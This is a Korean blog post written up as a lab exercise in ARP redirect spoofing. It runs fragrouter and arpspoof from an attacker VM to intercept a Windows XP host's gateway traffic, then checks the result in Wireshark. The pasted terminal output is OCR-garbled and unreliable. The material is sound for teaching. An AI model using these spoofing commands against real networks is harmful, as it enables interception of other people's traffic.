2020. 7. 8.

[Network] arp Redirect 실습


    1. 구성과 계획
    • 네트워크 구성도

    arp 리다이렉트 공격자
    att6 – 192.168.10.148 (00:0C:29:C6:9A:42) / gw 192.168.10.1 (70:5d:cc:04:be:b0)
    타겟 정보
    winXP – 192.168.10.112 (00:0C:29:AD:73:0C) / gw192.168.10.1 (70:5d:cc:04:be:b0)

    • 과정 정리
    step 1. 타겟 winXP arp
    step 2. 공격자 att6 fragrouter 실행
    step 3. 공격자 att6 arpspoof 실행
    step 4. 경로 패킷 확인

    1. 관련내용정리
    ARP 테이블 : 네트워크 인터페이스 고유번호인 MAC Address  주소록처럼 저장하여 컴퓨터가 통신할때 사용
    fragrouter : 들어온 패킷을 원래의 목적지로 보내주는 라우터기능의 도구
    arpspoof : MAC 주소 변조

    1. 실습과정
    step 1. 타겟 winXP arp
    arp -a 192.168.10.112
    root@localhost:- 
login as: 
root@192.168.Ia.148's password: 
Last login: Thu Jul g 13:48:13 2ø2ø from 192.168.1ø.146 
Croot@localhost arp -a 192.168. Ia. 112 
? (192.168.1e.112) at [ether) on ethe 
Croot@localhost
    공격자 터미널에서 arp를 이용한 상대 MAC주소 확인

    step 2. 공격자 att6 fragrouter 실행
    fragrouter -B1
    fray-outer: 
192.168.1e.1%.49192 
48847 win 6424e (OF) 
192.168.1e.1%.49197 
12 win 65392 (OF) 
localhost fray-outer -81 
base-I: normal IP forwarding 
> 2133.217.22g.1øe.443: 
> 12.245.223.1ø.21519: 
> 41.73.1ø5.76.62ß2: . 
. ack 33894139% win 511 (OF) 
. ack 34673 
ack 9965764
    라우팅 기능을 하기 위해 공격자 터미널 창을 따로 켜서 실행

    step 3. 공격자 att6 arpspoof 실행
    arpspoof -i eth0 -t 192.168.10.112 192.168.10.1
    root@localhost:- 
root@localhost 
a rpspoof 
-i ethe -t 
ø8ß6 42: 
ø8ß6 42: 
arp 
arp 
192.168.1ø.112 192.168.1ø 
reply 192.168.1ø.1 
reply 192.168.1ø.1 
is-at 
is-at
    공격자 터미널에서 ARP 스푸핑중인 패킷 내용으로 피해자 PC MAC 주소 테이블의 게이트웨이를 변조

    step 4. 경로 패킷 확인
    xp에서 ping 쏘았을 att6에서 wireshark 이용하여 캡처한 패킷
    00 0c 29 c6 9a 42 att 6 공격자의 주소로 현재 패킷의 도착지이다.
    00 0c 29 ad 73 0c xp 피해자의 주소로 현재 패킷의 출발지이다.
    70 5d cc 04 be b0 게이트웨이의 주소로 현재 패킷의 도착이다.
    00 0c 29 c6 9a 42 att6 공격자의 주소로 현재 패킷의 출발지이다.

    원래는 xp에서 게이트웨이로 가야하지만 ARP 스푸핑을 당한 상태라 xp 패킷은 att6 거쳐 게이트웨이로 나가기 때문에 중간에서 스니핑을 당하고 있는 상태이다.

댓글 없음:

댓글 쓰기